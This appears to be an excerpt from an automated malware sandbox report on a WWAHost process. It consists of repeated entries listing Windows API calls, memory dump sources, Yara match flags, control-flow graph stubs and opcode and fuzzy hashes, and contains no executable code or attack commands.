                                              • Opcode Fuzzy Hash: 30f3e2d3f3dd8beef991e374b68dccf34926be16a725a4ffd8bdeb7dd105990e
                                              • Instruction Fuzzy Hash: 7E9002B120154812D140B15D4414746005597D0345F91C111A5054594E8B998DD576E5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 97159ae5ef987141599cd4e0c946e768b887809342f4f1091f522ea0ee54b39f
                                              • Instruction ID: 62bb728fe4a3b07e46536fb5b89e7430997beb0df3b2a464850b41fa41635f9d
                                              • Opcode Fuzzy Hash: 97159ae5ef987141599cd4e0c946e768b887809342f4f1091f522ea0ee54b39f
                                              • Instruction Fuzzy Hash: F9900261242585625545F15D44145074056A7E02857D1C112A1404990C8A669856E6A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 529fded06f95b6716a8052f2f49877aaebd8ad9c0923db79e3fc8242ef01fb3c
                                              • Instruction ID: 6462ea857a9249b3ea686817e588331476579443f99dacd79387abbf21079bd4
                                              • Opcode Fuzzy Hash: 529fded06f95b6716a8052f2f49877aaebd8ad9c0923db79e3fc8242ef01fb3c
                                              • Instruction Fuzzy Hash: 2090027120154823D111A15D4514707005997D0285FD1C512A0414598D9B968952B1A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 013434a9b08f6584d41ba20dbfc7e4754270b9ff3b3786cd54b7d9cd0470a1a6
                                              • Instruction ID: de62e0c2401a796308626bc7923b656b3d7e6729a021487f3cb98e3e8e79e4d4
                                              • Opcode Fuzzy Hash: 013434a9b08f6584d41ba20dbfc7e4754270b9ff3b3786cd54b7d9cd0470a1a6
                                              • Instruction Fuzzy Hash: 5890026921354412D180B15D541860A005597D1246FD1D515A0005598CCE55886963A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 7cc115e16c48011f45d7d9659f8195cbdab20280b7a1b7234515ac1b4e6038b6
                                              • Instruction ID: 75b6eb21732650db623168adac8ff1581b9d01f2d3cb82227b752d92561c3f0f
                                              • Opcode Fuzzy Hash: 7cc115e16c48011f45d7d9659f8195cbdab20280b7a1b7234515ac1b4e6038b6
                                              • Instruction Fuzzy Hash: C990027131168812D110A15D8414706005597D1245F91C511A0814598D8BD5889171A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 818590e6338fbb831b8d2e1d5d9246a6866cdb76973bd801daceb92bed262cb3
                                              • Instruction ID: 4079803de83752fbee86603428507d6608f6de048f624c166ed87a6389f44322
                                              • Opcode Fuzzy Hash: 818590e6338fbb831b8d2e1d5d9246a6866cdb76973bd801daceb92bed262cb3
                                              • Instruction Fuzzy Hash: CA90027120154812D100A59D5418646005597E0345F91D111A5014595ECBA5889171B1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: f50809b3d611b6ce595f920e8bed52076011a701ae46bd272859ff8217af16ff
                                              • Instruction ID: c22da97ceafa93ca336d5fb1d3cefc49960eceb0a5a7a311d9fba7089a289b69
                                              • Opcode Fuzzy Hash: f50809b3d611b6ce595f920e8bed52076011a701ae46bd272859ff8217af16ff
                                              • Instruction Fuzzy Hash: C790027120154C52D100A15D4414B46005597E0345F91C116A0114694D8B55C85175A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 12164ed4a2f734e794a7902a4c0da6ad3c8890d3c6af357e77e485d02e603ad1
                                              • Instruction ID: 53dee76d34b4cb22686f7a29d3a21ec071d330a92933835250687afb29b74273
                                              • Opcode Fuzzy Hash: 12164ed4a2f734e794a7902a4c0da6ad3c8890d3c6af357e77e485d02e603ad1
                                              • Instruction Fuzzy Hash: 7C9002712015CC12D110A15D841474A005597D0345F95C511A4414698D8BD5889171A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3a5ce1d2f878afb662197f846439035bcf47654d54b42a0adbbe25ff9c1d802d
                                              • Instruction ID: 7193130a057c8e8856a5f3579388c283a6f49ddad332839c764c7248c6f9191c
                                              • Opcode Fuzzy Hash: 3a5ce1d2f878afb662197f846439035bcf47654d54b42a0adbbe25ff9c1d802d
                                              • Instruction Fuzzy Hash: 2890027120558C52D140B15D4414A46006597D0349F91C111A00546D4D9B658D55B6E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 59c1392b3aefc906811481f2063cfe3633a81d23fd38893422408bdcecdf4094
                                              • Instruction ID: 061ba668ec6af407a5a839d3c1acd55e81cd37ecce4042d4e56467ff6f9580e0
                                              • Opcode Fuzzy Hash: 59c1392b3aefc906811481f2063cfe3633a81d23fd38893422408bdcecdf4094
                                              • Instruction Fuzzy Hash: 1D90027120154C12D180B15D441464A005597D1345FD1C115A0015694DCF558A5977E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: dc6603493ed6290347ae35dafd35974afcc4fb4e895c09d7ebac8b6c09ec7842
                                              • Instruction ID: 39d1553c31d89a13a9c9d8b68e1efba56f09f70a3cb805d4e6515231817c5eb2
                                              • Opcode Fuzzy Hash: dc6603493ed6290347ae35dafd35974afcc4fb4e895c09d7ebac8b6c09ec7842
                                              • Instruction Fuzzy Hash: 1D9002A1202544134105B15D4424616405A97E0245B91C121E10045D0DCA65889171A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 104604edd66ca90aa30e6933498fdcc53f76d45a68828f1161fb47a27b358270
                                              • Instruction ID: be726b7c634f767f08d07b0d6e18c290e3cdc61ee29b1d42ade66573e3d2dc06
                                              • Opcode Fuzzy Hash: 104604edd66ca90aa30e6933498fdcc53f76d45a68828f1161fb47a27b358270
                                              • Instruction Fuzzy Hash: AC900265211544130105E55D0714507009697D5395391C121F1005590CDB61886161A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 297 a79030-a7905f 298 a7906b-a79072 297->298 299 a79066 call a7be60 297->299 300 a7914c-a79152 298->300 301 a79078-a790c8 call a7bf30 call a6a130 call a75a90 298->301 299->298 308 a790d0-a790e1 Sleep 301->308 309 a79146-a7914a 308->309 310 a790e3-a790e9 308->310 309->300 309->308 311 a79113-a79133 310->311 312 a790eb-a79111 call a78c60 310->312 313 a79139-a7913c 311->313 314 a79134 call a78e60 311->314 312->313 313->309 314->313
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 00A790D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: 1952a26a3df1b054f6ee6da639247102e8fecb388e01e2eecf6dae1e40aef123
                                              • Instruction ID: 07778cdb0c19bef554fddff1e4edf09f2745f57579670fecd9c108f82017eae9
                                              • Opcode Fuzzy Hash: 1952a26a3df1b054f6ee6da639247102e8fecb388e01e2eecf6dae1e40aef123
                                              • Instruction Fuzzy Hash: 5A316EB2602605ABD725DF64CCA5FA7B7B8BF48700F10C11DF61E9B241D770A555CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 317 a79027-a79072 call a7be60 320 a7914c-a79152 317->320 321 a79078-a790c8 call a7bf30 call a6a130 call a75a90 317->321 328 a790d0-a790e1 Sleep 321->328 329 a79146-a7914a 328->329 330 a790e3-a790e9 328->330 329->320 329->328 331 a79113-a79133 330->331 332 a790eb-a79111 call a78c60 330->332 333 a79139-a7913c 331->333 334 a79134 call a78e60 331->334 332->333 333->329 334->333
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 00A790D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: 1e5e11978888fdf192f27ff0a3c99c9a52a3ef018a1ad1907661bdacdffe2119
                                              • Instruction ID: 67725a25ec444472670b8c0b479f797af6723c65c7c487d1af6f64a8883f3641
                                              • Opcode Fuzzy Hash: 1e5e11978888fdf192f27ff0a3c99c9a52a3ef018a1ad1907661bdacdffe2119
                                              • Instruction Fuzzy Hash: 69217EB1602705ABD711DF64CDA5FABB7B8BF48704F10C12AF61D9B281D370A555CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 337 a67678-a6768f 339 a67698-a676ca call a7cb60 call a6a130 call a75a90 337->339 340 a67693 call a7bf80 337->340 347 a676fe-a67702 339->347 348 a676cc-a676de PostThreadMessageW 339->348 340->339 349 a676e0-a676fb call a69890 PostThreadMessageW 348->349 350 a676fd 348->350 349->350 350->347
                                              APIs
                                              • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00A676DA
                                              • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 00A676FB
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: 32befdd14b38229857358e5529e361a2c698d7806fb19add9150de854d7301a1
                                              • Instruction ID: 588990f17d1fcabfbffb1feb452513ace4b040081d2517c3b8d924c09cba2ac4
                                              • Opcode Fuzzy Hash: 32befdd14b38229857358e5529e361a2c698d7806fb19add9150de854d7301a1
                                              • Instruction Fuzzy Hash: 3301F531A901297AE720A794DC82FFE776CAF45F51F144119FB04BA1C0DBA46A0687E5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              APIs
                                              • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00A676DA
                                              • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 00A676FB
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: f67bdee04b0330a795eed618edd43cb063c8381520ef137713398ea470945c68
                                              • Instruction ID: beb83353fa3639ad51a03cbbc68b2fc285d0a9b749861c8272b235f51e1bd239
                                              • Opcode Fuzzy Hash: f67bdee04b0330a795eed618edd43cb063c8381520ef137713398ea470945c68
                                              • Instruction Fuzzy Hash: 0401F231A8022876E720A6A48D43FBE776C9B00F50F048118FF08BA1C1EBE4790647FA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              control_flow_graph 563 a7a68d-a7a68e 564 a7a676-a7a68c call a7af60 563->564 565 a7a690-a7a6aa call a7af60 563->565 569 a7a6af-a7a6e8 CreateProcessInternalW 565->569
                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 00A7A6E4
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: 6b4f56487060f96ac5e4c201276da682e2efd5f52a82f2f9f59fdc161e086afd
                                              • Instruction ID: 41a6c07b8986b7593f1df9c1739f31612926342c3020b3d767c294c2b08856d4
                                              • Opcode Fuzzy Hash: 6b4f56487060f96ac5e4c201276da682e2efd5f52a82f2f9f59fdc161e086afd
                                              • Instruction Fuzzy Hash: 86010EB2200208BBCB14DF98DC80DEB77ADEF8C754F15C248FA0CA7241C630E9518BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              control_flow_graph 577 a6a130-a6a14c 578 a6a154-a6a159 577->578 579 a6a14f call a7cdb0 577->579 580 a6a15f-a6a16d call a7d1d0 578->580 581 a6a15b-a6a15e 578->581 579->578 584 a6a16f-a6a17a call a7d450 580->584 585 a6a17d-a6a18e call a7b500 580->585 584->585 590 a6a1a7-a6a1aa 585->590 591 a6a190-a6a1a4 LdrLoadDll 585->591 591->590
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00A6A1A2
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
                                              • Instruction ID: 9f4aa99b38a653bde496138861a3862a90eabbaaf3e7cea8e8a613e23e23ba96
                                              • Opcode Fuzzy Hash: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
                                              • Instruction Fuzzy Hash: E3011EB5E0020DABDB10DBA4DD42FDDB7B89F54308F0082A5A91DA7241F671EB14CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              control_flow_graph 603 a7a690-a7a6e8 call a7af60 CreateProcessInternalW
                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 00A7A6E4
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                              • Instruction ID: b47590f9b8e9104a2697cf212d0fe476a6245dcc88ec0ea0e3e33c43d7de8229
                                              • Opcode Fuzzy Hash: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                              • Instruction Fuzzy Hash: F601B2B2210108BFCB54DF89DC80EEB77ADAF8C754F118258FA0D97241C630E851CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00A6D2E0,?,?), ref: 00A7919C
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: 2b72e38545c6b1a77ed511e54550852098506dab51eee5d0e60a26b419388c25
                                              • Instruction ID: 59ed14cbe022601298dae1a5947eac81e6c72e727390ed07e707359958fd62d4
                                              • Opcode Fuzzy Hash: 2b72e38545c6b1a77ed511e54550852098506dab51eee5d0e60a26b419388c25
                                              • Instruction Fuzzy Hash: 6EE06D337803143AE22061A99C02FA7B38CDB80B61F54813AFA0DEB2C1D591F90102A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 00A7A64D
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: 3eb0e80f9e804458ffad518fcaa2a2d19d3c3b9b34952f36cdb6bf968c08d30d
                                              • Instruction ID: 6303f467028bed4bf351a09b3741bfab837d4418a55a2ce860d4e666bf36f92f
                                              • Opcode Fuzzy Hash: 3eb0e80f9e804458ffad518fcaa2a2d19d3c3b9b34952f36cdb6bf968c08d30d
                                              • Instruction Fuzzy Hash: FCF06DB5600208BFDB28DF59DD46EEB37A8EF84350F208159F90EA7251CA30E910CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00A75176,?,00A758EF,00A758EF,?,00A75176,?,?,?,?,?,00000000,00000005,00000206), ref: 00A7A60D
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                              • Instruction ID: ca965ebc542fc73ff43e237b472de253036d4602011c26237265aa428d6a5f3a
                                              • Opcode Fuzzy Hash: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                              • Instruction Fuzzy Hash: 01E012B1200208ABDB14EF89DC85EAB37ACEF88654F118158FA085B242CA30F9108AB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 00A7A64D
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                              • Instruction ID: dda598d7d3f275c4ff0e19fe78b5405ffb078ce9326ea2cbb3970a71ce3bd8fc
                                              • Opcode Fuzzy Hash: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                              • Instruction Fuzzy Hash: CCE012B1200208ABDB14EF89DC49EAB37ACEF88750F118158FA0C5B242C630E9108AB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A6D5B2,00A6D5B2,?,00000000,?,?), ref: 00A7A7B0
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                              • Instruction ID: 2a4de8d48c38aff11ce4ee3661959f1a787a3b04b31ace4e066eadd01511026a
                                              • Opcode Fuzzy Hash: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                              • Instruction Fuzzy Hash: 3AE01AB12002087BDB10DF49CC45EE737ADEF89654F118154FA0C57241C530E8148AB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,00A68233,?), ref: 00A6DA4B
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: ce7fbc4bbb014646b639d4b1b2d684765decd5df623d996ba46e737454f497d0
                                              • Instruction ID: bfcb30ee8987514bfef2455954d0cd594f0c79160546820ad8c87b0c5accea81
                                              • Opcode Fuzzy Hash: ce7fbc4bbb014646b639d4b1b2d684765decd5df623d996ba46e737454f497d0
                                              • Instruction Fuzzy Hash: 99E02B71754300A6F720DBA08C42FA73698AF8C780F0840E4FC4DDB3C3E670E0208218
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,00A68233,?), ref: 00A6DA4B
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: a714ccd9be1f095c3c74df8391fc4f48c6866eedcca8de211dbdf4dcb0402e58
                                              • Instruction ID: 3ff20b43eada17837a7d2a561e8c84a9779b882bd43b1e1169df0133215de312
                                              • Opcode Fuzzy Hash: a714ccd9be1f095c3c74df8391fc4f48c6866eedcca8de211dbdf4dcb0402e58
                                              • Instruction Fuzzy Hash: A9D05E71A4430427E610E6E48C47F2636989B88A80F058074F909DA2C2EAA0E4004164
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
